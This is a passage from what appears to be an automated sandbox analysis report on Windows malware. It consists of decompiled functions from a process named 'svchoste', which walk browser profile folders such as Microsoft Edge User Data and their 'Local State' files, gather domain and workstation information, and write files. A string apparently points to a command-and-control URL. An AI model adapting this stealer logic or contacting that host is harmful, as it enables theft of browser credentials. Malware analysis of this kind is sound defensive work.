				_t100 =  *0xba2190; // 0x2d07dc0
				_t132 =  *0xba2180; // 0x2d08078
				_t65 =  *0xba2180; // 0x2d08078
				E00B94E20(_t69, _t134, _t135, _t170, _t65, _t132, _t100); // executed
				_t101 =  *0xba21dc; // 0x2d072d8
				_t133 =  *0xba2130; // 0x2d082c8
				_t67 =  *0xba2300; // 0x2d080f0
				_t68 = E00B94E20(_t69, _t134, _t135, _t170, _t67, _t133, _t101); // executed
				return _t68;
			}

0x00b94f00
0x00b94f00
0x00b94f00
0x00b94f0f
0x00b94f20
0x00b94f26
0x00b94f2d
0x00b94f34
0x00b94f3a
0x00b94f42
0x00b94f49
0x00b94f50
0x00b94f56
0x00b94f5e
0x00b94f65
0x00b94f6c
0x00b94f72
0x00b94f7a
0x00b94f81
0x00b94f88
0x00b94f8e
0x00b94f96
0x00b94f9d
0x00b94fa4
0x00b94faa
0x00b94fb2
0x00b94fb9
0x00b94fc0
0x00b94fc6
0x00b94fce
0x00b94fd5
0x00b94fdc
0x00b94fe2
0x00b94fea
0x00b94ff1
0x00b94ff8
0x00b94ffe
0x00b95006
0x00b9500d
0x00b95014
0x00b9501a
0x00b95022
0x00b95029
0x00b95030
0x00b95036
0x00b9503e
0x00b95045
0x00b9504c
0x00b95052
0x00b9505a
0x00b95061
0x00b95068
0x00b9506e
0x00b95076
0x00b9507d
0x00b95084
0x00b9508a
0x00b95092
0x00b95099
0x00b950a0
0x00b950a6
0x00b950ae
0x00b950b5
0x00b950bc
0x00b950c2
0x00b950ca
0x00b950d1
0x00b950d8
0x00b950de
0x00b950e6
0x00b950ed
0x00b950f4
0x00b950fa
0x00b95102
0x00b95109
0x00b95110
0x00b95116
0x00b9511e
0x00b95125
0x00b9512c
0x00b95132
0x00b9513a
0x00b95141
0x00b95148
0x00b9514e
0x00b95156
0x00b9515d
0x00b95164
0x00b9516a
0x00b95172
0x00b95179
0x00b95180
0x00b95186
0x00b9518e
0x00b95195
0x00b9519c
0x00b951a2
0x00b951aa
0x00b951b1
0x00b951b8
0x00b951be
0x00b951c6
0x00b951cd
0x00b951d4
0x00b951da
0x00b951e2
0x00b951e9
0x00b951f0
0x00b951f6
0x00b951fe
0x00b95205
0x00b9520c
0x00b95212
0x00b9521a
0x00b95221
0x00b95228
0x00b9522e
0x00b95236
0x00b9523d
0x00b95244
0x00b9524a
0x00b95252
0x00b95259
0x00b95260
0x00b95266
0x00b9526e
0x00b95275
0x00b9527c
0x00b95282
0x00b9528a
0x00b95291
0x00b95298
0x00b9529e
0x00b952a7

APIs

_memset.LIBCMT ref: 00B94F0F
lstrcat.KERNEL32(C:\\ProgramData\\216363876181815,00B910BE), ref: 00B94F20

Part of subcall function 00B94E20: _memset.LIBCMT ref: 00B94E41
Part of subcall function 00B94E20: lstrcat.KERNEL32(?,02D07DF0), ref: 00B94E65
Part of subcall function 00B94E20: _memset.LIBCMT ref: 00B94E79
Part of subcall function 00B94E20: lstrcat.KERNEL32(?,C:\\ProgramData\\216363876181815), ref: 00B94E8D
Part of subcall function 00B94E20: lstrcat.KERNEL32(?,02D07EF8), ref: 00B94EA0
Part of subcall function 00B94E20: lstrcat.KERNEL32(?,02D07DF0), ref: 00B94EB1
Part of subcall function 00B94E20: CreateDirectoryA.KERNEL32(?,00000000), ref: 00B94EC0

Strings

C:\\ProgramData\\216363876181815, xrefs: 00B94F0A, 00B94F1B

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$CreateDirectory
String ID: C:\\ProgramData\\216363876181815
API String ID: 2116157328-420526346
Opcode ID: 27dd110eb0ef265d4e24f01b9cc8ff990575a4cd6bae38636d4860a80229e8d9
Instruction ID: eedd235ce8925384c9feff7279f989ae1eeacd91379d47edd3dd514c4c063e19
Opcode Fuzzy Hash: 27dd110eb0ef265d4e24f01b9cc8ff990575a4cd6bae38636d4860a80229e8d9
Instruction Fuzzy Hash: 9BA1B7F2A50500ABCB08EBDCFC97C2633EAB79E3047048568F70997771EE34A9118B65

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EBD0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00B8EBD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v275;
				char _v276;
				intOrPtr _v280;
				void* __ebp;
				signed int _t8;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				signed int _t114;
				void* _t115;
				void* _t117;

				_t113 = __esi;
				_t112 = __edi;
				_t68 = __ebx;
				_t8 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t8 ^ _t114;
				_v276 = 0;
				E00B791C0( &_v275, 0, 0x103);
				_t69 =  *0xba21d0; // 0x2d010d8
				_t92 =  *0xba25d0; // 0x2d06af0
				_t12 = E00B755AB(_t92, _t69); // executed
				_t117 = _t115 + 0x14;
				_v280 = _t12;
				_t148 = _v280;
				if(_v280 != 0) {
					_push(_v280);
					E00B75EA3(__ebx, _t92, __edi, __esi, _t148);
					_t117 = _t117 + 4; // executed
				}
				E00B8BEE0(_t68); // executed
				E00B8C810();
				_t70 =  *0xba23f8; // 0x2d06b20
				_t93 =  *0xba24f4; // 0x2d06330
				E00B8EAB0(_t68, _t112, _t113, _t148, _t93, _t70); // executed
				_t16 =  *0xba2200; // 0x2d06b98
				_t71 =  *0xba25e4; // 0x2d05ec0
				E00B8EAB0(_t68, _t112, _t113, _t148, _t71, _t16); // executed
				_t94 =  *0xba2288; // 0x2d066a0
				_t18 =  *0xba253c; // 0x2d06120
				E00B8EAB0(_t68, _t112, _t113, _t148, _t18, _t94); // executed
				_t72 =  *0xba24b8; // 0x2d06870
				_t95 =  *0xba246c; // 0x2d060c0
				E00B8EAB0(_t68, _t112, _t113, _t148, _t95, _t72); // executed
				_t21 =  *0xba23fc; // 0x2d066c0
				_t73 =  *0xba2670; // 0x2d060a0
				E00B8EAB0(_t68, _t112, _t113, _t148, _t73, _t21); // executed
				_t96 =  *0xba254c; // 0x2d06740
				_t23 =  *0xba230c; // 0x2d05fa0
				E00B8EAB0(_t68, _t112, _t113, _t148, _t23, _t96); // executed
				_t74 =  *0xba2640; // 0x2d06958
				_t97 =  *0xba2684; // 0x2d064e8
				E00B8EAB0(_t68, _t112, _t113, _t148, _t97, _t74); // executed
				_t26 =  *0xba2268; // 0x2d068f8
				_t75 =  *0xba2324; // 0x2d06020
				E00B8EAB0(_t68, _t112, _t113, _t148, _t75, _t26); // executed
				_t98 =  *0xba23c4; // 0x2d06910
				_t28 =  *0xba2350; // 0x2d06140
				E00B8EAB0(_t68, _t112, _t113, _t148, _t28, _t98); // executed
				_t76 =  *0xba20b4; // 0x2d06850
				_t99 =  *0xba21bc; // 0x2d06040
				E00B8EAB0(_t68, _t112, _t113, _t148, _t99, _t76); // executed
				_t31 =  *0xba2598; // 0x2d066d0
				_t77 =  *0xba24dc; // 0x2d06e10
				E00B8EAB0(_t68, _t112, _t113, _t148, _t77, _t31); // executed
				_t100 =  *0xba2410; // 0x2d06770
				_t33 =  *0xba2320; // 0x2d06160
				E00B8EAB0(_t68, _t112, _t113, _t148, _t33, _t100); // executed
				_t78 =  *0xba20fc; // 0x2d06b38
				_t101 =  *0xba231c; // 0x2d062b8
				E00B8EAB0(_t68, _t112, _t113, _t148, _t101, _t78); // executed
				_t36 =  *0xba240c; // 0x2d06928
				_t79 =  *0xba223c; // 0x2d06498
				E00B8EAB0(_t68, _t112, _t113, _t148, _t79, _t36); // executed
				_t102 =  *0xba24d8; // 0x2d06988
				_t38 =  *0xba235c; // 0x2d06060
				E00B8EAB0(_t68, _t112, _t113, _t148, _t38, _t102); // executed
				_t80 =  *0xba2638; // 0x2d06810
				_t103 =  *0xba25b8; // 0x2d06308
				E00B8EAB0(_t68, _t112, _t113, _t148, _t103, _t80); // executed
				_t41 =  *0xba2148; // 0x2d05ee0
				_t81 =  *0xba2358; // 0x2d06448
				E00B8EAB0(_t68, _t112, _t113, _t148, _t81, _t41); // executed
				_t104 =  *0xba2660; // 0x2d06780
				_t43 =  *0xba260c; // 0x2d06180
				E00B8EAB0(_t68, _t112, _t113, _t148, _t43, _t104); // executed
				E00B8EAB0(_t68, _t112, _t113, _t148, "\\Microsoft\\Edge\\User Data\\", "Microsoft Edge"); // executed
				_t82 =  *0xba2168; // 0x2d06b68
				_t105 =  *0xba2128; // 0x2d062e0
				E00B8EAB0(_t68, _t112, _t113, _t148, _t105, _t82); // executed
				_t47 =  *0xba23d0; // 0x2d06790
				_t83 =  *0xba26e0; // 0x2d06e48
				E00B8EAB0(_t68, _t112, _t113, _t148, _t83, _t47); // executed
				_t106 =  *0xba2370; // 0x2d06800
				_t49 =  *0xba2368; // 0x2d06dd8
				E00B8E990(_t68, _t112, _t113, _t148, _t49, _t106); // executed
				_t84 =  *0xba2334; // 0x2d06970
				_t107 =  *0xba2260; // 0x2d065b0
				E00B8D650(_t68, _t112, _t113, _t148, _t107, _t84); // executed
				_t52 =  *0xba20b0; // 0x2d069a0
				_t85 =  *0xba251c; // 0x2d06e80
				E00B8D650(_t68, _t112, _t113, _t148, _t85, _t52); // executed
				_t108 =  *0xba23b4; // 0x2d069b8
				_t54 =  *0xba2444; // 0x2d05f00
				E00B8D650(_t68, _t112, _t113, _t148, _t54, _t108); // executed
				_t86 =  *0xba22a8; // 0x2d06bb0
				_t109 =  *0xba2284; // 0x2d06eb8
				E00B8D650(_t68, _t112, _t113, _t148, _t109, _t86); // executed
				_t57 =  *0xba2514; // 0x2d06be0
				_t87 =  *0xba21c0; // 0x2d06ee8
				E00B8D650(_t68, _t112, _t113, _t148, _t87, _t57); // executed
				_t110 =  *0xba20f0; // 0x2d067a0
				_t59 =  *0xba2434; // 0x2d064c0
				E00B8D650(_t68, _t112, _t113, _t148, _t59, _t110); // executed
				_t88 =  *0xba2208; // 0x2d067d0
				_t111 =  *0xba2228; // 0x2d06bf8
				E00B8D650(_t68, _t112, _t113, _t148, _t111, _t88); // executed
				_t62 =  *0xba2248; // 0x2d06c10
				_t89 =  *0xba23b0; // 0x2d06380
				E00B8D650(_t68, _t112, _t113, _t148, _t89, _t62); // executed
				_t64 = E00B8C670(); // executed
				return E00B74354(_t64, _t68, _v8 ^ _t114, _t111, _t112, _t113);
			}

0x00b8ebd0
0x00b8ebd0
0x00b8ebd0
0x00b8ebd9
0x00b8ebe0
0x00b8ebe3
0x00b8ebf8
0x00b8ec00
0x00b8ec07
0x00b8ec0e
0x00b8ec13
0x00b8ec16
0x00b8ec1c
0x00b8ec23
0x00b8ec2b
0x00b8ec2c
0x00b8ec31
0x00b8ec31
0x00b8ec34
0x00b8ec39
0x00b8ec3e
0x00b8ec45
0x00b8ec4c
0x00b8ec54
0x00b8ec5a
0x00b8ec61
0x00b8ec69
0x00b8ec70
0x00b8ec76
0x00b8ec7e
0x00b8ec85
0x00b8ec8c
0x00b8ec94
0x00b8ec9a
0x00b8eca1
0x00b8eca9
0x00b8ecb0
0x00b8ecb6
0x00b8ecbe
0x00b8ecc5
0x00b8eccc
0x00b8ecd4
0x00b8ecda
0x00b8ece1
0x00b8ece9
0x00b8ecf0
0x00b8ecf6
0x00b8ecfe
0x00b8ed05
0x00b8ed0c
0x00b8ed14
0x00b8ed1a
0x00b8ed21
0x00b8ed29
0x00b8ed30
0x00b8ed36
0x00b8ed3e
0x00b8ed45
0x00b8ed4c
0x00b8ed54
0x00b8ed5a
0x00b8ed61
0x00b8ed69
0x00b8ed70
0x00b8ed76
0x00b8ed7e
0x00b8ed85
0x00b8ed8c
0x00b8ed94
0x00b8ed9a
0x00b8eda1
0x00b8eda9
0x00b8edb0
0x00b8edb6
0x00b8edc8
0x00b8edd0
0x00b8edd7
0x00b8edde
0x00b8ede6
0x00b8edec
0x00b8edf3
0x00b8edfb
0x00b8ee02
0x00b8ee08
0x00b8ee10
0x00b8ee17
0x00b8ee1e
0x00b8ee26
0x00b8ee2c
0x00b8ee33
0x00b8ee3b
0x00b8ee42
0x00b8ee48
0x00b8ee50
0x00b8ee57
0x00b8ee5e
0x00b8ee66
0x00b8ee6c
0x00b8ee73
0x00b8ee7b
0x00b8ee82
0x00b8ee88
0x00b8ee90
0x00b8ee97
0x00b8ee9e
0x00b8eea6
0x00b8eeac
0x00b8eeb3
0x00b8eebb
0x00b8eecd

APIs

_memset.LIBCMT ref: 00B8EBF8

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

Part of subcall function 00B8EAB0: _memset.LIBCMT ref: 00B8EADF
Part of subcall function 00B8EAB0: lstrcat.KERNEL32(?,00000000), ref: 00B8EB03
Part of subcall function 00B8EAB0: _memset.LIBCMT ref: 00B8EB17
Part of subcall function 00B8EAB0: lstrcat.KERNEL32(?,?), ref: 00B8EB2D
Part of subcall function 00B8EAB0: lstrcat.KERNEL32(?,\Local State), ref: 00B8EB3F

Part of subcall function 00B8E990: _memset.LIBCMT ref: 00B8E9BF
Part of subcall function 00B8E990: lstrcat.KERNEL32(?,00000000), ref: 00B8E9E3
Part of subcall function 00B8E990: _memset.LIBCMT ref: 00B8E9F7
Part of subcall function 00B8E990: lstrcat.KERNEL32(?,?), ref: 00B8EA0D
Part of subcall function 00B8E990: lstrcat.KERNEL32(?,\Local State), ref: 00B8EA1F

Part of subcall function 00B8D650: _memset.LIBCMT ref: 00B8D671
Part of subcall function 00B8D650: _memset.LIBCMT ref: 00B8D687
Part of subcall function 00B8D650: lstrcat.KERNEL32(?,?), ref: 00B8D6AB
Part of subcall function 00B8D650: lstrcat.KERNEL32(?,?), ref: 00B8D6BF
Part of subcall function 00B8D650: lstrcat.KERNEL32(?,02D05E60), ref: 00B8D6D3

Part of subcall function 00B8C670: FreeLibrary.KERNEL32(60900000), ref: 00B8C679

Strings

\Microsoft\Edge\User Data\, xrefs: 00B8EDC3
Microsoft Edge, xrefs: 00B8EDBE

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$FreeLibrary__fsopen
String ID: Microsoft Edge$\Microsoft\Edge\User Data\
API String ID: 620465251-1389121604
Opcode ID: e2441e4a0a3a60f1d2df9605a8c44eb0eaa747f17038e09cdc51bf8f4a4a6aa0
Instruction ID: 639a2506627b35ad9d6a45a09edd26021f2ea14715f98bc74c9f5feb64c4e7c4
Opcode Fuzzy Hash: e2441e4a0a3a60f1d2df9605a8c44eb0eaa747f17038e09cdc51bf8f4a4a6aa0
Instruction Fuzzy Hash: 67710BB6910100ABC608FBACFCD3D6A33F9B79B701B044658F61997272EE35D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B92F70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B92F70(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v104;
				void* _v108;
				void* _v112;
				signed int _t27;
				intOrPtr _t30;
				long _t36;
				void* _t38;
				void* _t39;
				signed int _t65;

				_push(0xffffffff);
				_push(E00B9658C);
				_push( *[fs:0x0]);
				_t27 =  *0xba01f4; // 0xac8b3e58
				_v20 = _t27 ^ _t65;
				 *[fs:0x0] =  &_v16;
				_t30 =  *0xba2354; // 0xb9a074
				E00B711C0( &_v104, _t30); // executed
				_v8 = 0;
				E00B711C0( &_v48, _a4);
				_v8 = 1;
				E00B92D00(__ebx, __edi, __esi,  &_v76,  &_v48); // executed
				_v8 = 3;
				E00B712D0( &_v48);
				_t36 = E00B71350( &_v76);
				_t38 = RtlAllocateHeap(GetProcessHeap(), 0, _t36); // executed
				_v108 = _t38;
				_t39 = E00B71330( &_v104);
				E00B92980(__ebx, E00B71330( &_v76), _t39,  &_v108); // executed
				_v112 = _v108;
				_v8 = 0;
				E00B712D0( &_v76);
				_v8 = 0xffffffff;
				E00B712D0( &_v104);
				 *[fs:0x0] = _v16;
				return E00B74354(_v112, __ebx, _v20 ^ _t65, _v108, __edi, __esi, _t27 ^ _t65);
			}

0x00b92f73
0x00b92f75
0x00b92f80
0x00b92f84
0x00b92f8b
0x00b92f92
0x00b92f98
0x00b92fa1
0x00b92fa6
0x00b92fb4
0x00b92fb9
0x00b92fc5
0x00b92fcd
0x00b92fd4
0x00b92fdc
0x00b92feb
0x00b92ff1
0x00b92ffb
0x00b9300a
0x00b93015
0x00b93018
0x00b9301f
0x00b93024
0x00b9302e
0x00b93039
0x00b9304e

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,AC8B3E58), ref: 00B92FE4
RtlAllocateHeap.NTDLL(00000000,?,AC8B3E58), ref: 00B92FEB

Strings

pplonline.org/Cgi/, xrefs: 00B92F80

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: pplonline.org/Cgi/
API String ID: 1357844191-2754787850
Opcode ID: 594bb12c3f401a86b2759b34a136c32e1706847b4c320e4a097bae8e656f5c73
Instruction ID: 131c556ed418d79f3df917a3a3af5d7d555a6bf0b91f4c445781888f6ae9c2ea
Opcode Fuzzy Hash: 594bb12c3f401a86b2759b34a136c32e1706847b4c320e4a097bae8e656f5c73
Instruction Fuzzy Hash: E9213171C00208ABCB05EFE8C955BDEB7F8EF15310F148569E42AAB691DF346A08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B500, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B8B500() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char* _t11;

				_v16 = 0x64;
				_v20 = 0;
				_v12 = 0;
				_t11 =  &_v20;
				__imp__NetWkstaGetInfo(_v12, _v16, _t11); // executed
				_v8 = _t11;
				if(_v8 != 0) {
					return "Unknown";
				}
				return E00B8A160( *((intOrPtr*)(_v20 + 8)));
			}

0x00b8b506
0x00b8b50d
0x00b8b514
0x00b8b51b
0x00b8b527
0x00b8b52d
0x00b8b534
0x00000000
0x00b8b549
0x00000000

APIs

NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 00B8B527

Part of subcall function 00B8A160: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B8A1B2
Part of subcall function 00B8A160: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00B8A1E8

Strings

d, xrefs: 00B8B506
Unknown, xrefs: 00B8B549

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ByteCharMultiWide$InfoWksta
String ID: Unknown$d
API String ID: 825033016-3021344351
Opcode ID: f4f318a4c7944f7a89b911aa21a806ae7c50a79269ce7e734afbec1e52125d42
Instruction ID: 9789621a3fac01da1a9743e845d99268670845eb051999312a8b9294b75293dc
Opcode Fuzzy Hash: f4f318a4c7944f7a89b911aa21a806ae7c50a79269ce7e734afbec1e52125d42
Instruction Fuzzy Hash: 67F058B5C0420CEBDB00EFA4E949BAEB7F8AB08700F0085D9E505A7260DB35AA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B570, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B8B570() {
				intOrPtr _v8;
				char _v280;
				char* _t8;

				_t8 =  &_v280;
				__imp__DsRoleGetPrimaryDomainInformation(0, 1, _t8); // executed
				_v8 = _t8;
				if(_v8 == 0) {
					if( *((intOrPtr*)(_v280 + 0xc)) != 0) {
						return E00B8A160( *((intOrPtr*)(_v280 + 0xc)));
					}
					return "Unknown";
				}
				return "Unknown";
			}

0x00b8b579
0x00b8b584
0x00b8b58a
0x00b8b591
0x00b8b5a4
0x00000000
0x00b8b5be
0x00000000
0x00b8b5a6
0x00000000

APIs

DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 00B8B584

Strings

Unknown, xrefs: 00B8B5A6
Unknown, xrefs: 00B8B593

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: DomainInformationPrimaryRole
String ID: Unknown$Unknown
API String ID: 2855586375-3288453820
Opcode ID: 6a330dce476dcc18c8c87a3f27448be54d6bd9513be0aaf378dfff07afbaa8ba
Instruction ID: bc861180258e4439c3bdd3f4b252b9ba57563594cd165b2cec6fc7e1e5f8ce4c
Opcode Fuzzy Hash: 6a330dce476dcc18c8c87a3f27448be54d6bd9513be0aaf378dfff07afbaa8ba
Instruction Fuzzy Hash: 7DF0E57090410CDBDB10FA64D956BE9B3FADB04B01F0082E5EA09972A0D735DD45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B87880, Relevance: 4.6, APIs: 3, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B87880(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v12;
				void* _t45;

				_v12 = __ecx;
				_v8 = 0;
				if(( *(_v12 + 0x2c) & 0x000000ff) == 0) {
					_t45 = E00B876C0(_v12); // executed
					_v8 = _t45;
				}
				 *(_v12 + 0x2c) = 1;
				if( *(_v12 + 0x20) != 0 &&  *(_v12 + 0xc) != 0) {
					UnmapViewOfFile( *(_v12 + 0x20));
				}
				 *(_v12 + 0x20) = 0;
				if( *(_v12 + 0xc) != 0) {
					CloseHandle( *(_v12 + 0xc));
				}
				 *(_v12 + 0xc) = 0;
				if( *(_v12 + 4) != 0 && ( *(_v12 + 8) & 0x000000ff) != 0) {
					CloseHandle( *(_v12 + 4));
				}
				 *(_v12 + 4) = 0;
				 *(_v12 + 8) = 0;
				return _v8;
			}

0x00b87886
0x00b87889
0x00b87899
0x00b8789e
0x00b878a3
0x00b878a3
0x00b878a9
0x00b878b4
0x00b878c6
0x00b878c6
0x00b878cf
0x00b878dd
0x00b878e6
0x00b878e6
0x00b878ef
0x00b878fd
0x00b87911
0x00b87911
0x00b8791a
0x00b87924
0x00b8792e

APIs

UnmapViewOfFile.KERNEL32(00000000), ref: 00B878C6
CloseHandle.KERNEL32(00000000), ref: 00B878E6
CloseHandle.KERNEL32(00000000), ref: 00B87911

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: b9bcef79e9905587bb16c8fbbbf1db6ba65bee390d264c37eb85c3dc0d58f0ce
Instruction ID: 7225a7d6e194a6a9a8d0c60685b7d4369a9052c9fb9d0f079fc8930f6b0e3eb3
Opcode Fuzzy Hash: b9bcef79e9905587bb16c8fbbbf1db6ba65bee390d264c37eb85c3dc0d58f0ce
Instruction Fuzzy Hash: ED21B474A14208EFDB04DF95C598B9DFBB1BB48319F1886C8D8845B3A1CB75EA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B91440, Relevance: 4.5, APIs: 3, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B91440(intOrPtr __ecx, CHAR* _a4) {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				void* _t19;

				_v16 = __ecx;
				if( *(_v16 + 0x28) == 0 ||  *(_v16 + 0x34) == 0) {
					return 0;
				} else {
					_t19 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0x80, 0); // executed
					_v12 = _t19;
					if(_v12 != 0xffffffff) {
						_v8 = 0;
						WriteFile(_v12,  *(_v16 + 0x28),  *(_v16 + 0x34),  &_v8, 0); // executed
						CloseHandle(_v12);
						return 1;
					}
					return 0;
				}
			}

0x00b91446
0x00b91450
0x00000000
0x00b9145f
0x00b91475
0x00b9147b
0x00b91482
0x00b91488
0x00b914a7
0x00b914b1
0x00000000
0x00b914b7
0x00000000
0x00b91484

APIs

CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,AC8B3E58), ref: 00B91475
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00B914A7
CloseHandle.KERNEL32(000000FF), ref: 00B914B1

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 0e39875268b89f073bb42d2c836df5d1e00b8d9b8a78d8747c0fd2b7a6c14e9f
Instruction ID: e46024be03a589a8bbc9c11e36e220597d6460fc80ebbbe76018cd2185b2288e
Opcode Fuzzy Hash: 0e39875268b89f073bb42d2c836df5d1e00b8d9b8a78d8747c0fd2b7a6c14e9f
Instruction Fuzzy Hash: 00118074A40208FFDB10CBA8C885F9EB7B5EB48310F2086A9EA15A73C0C770AA41DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B0E0, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8B0E0() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
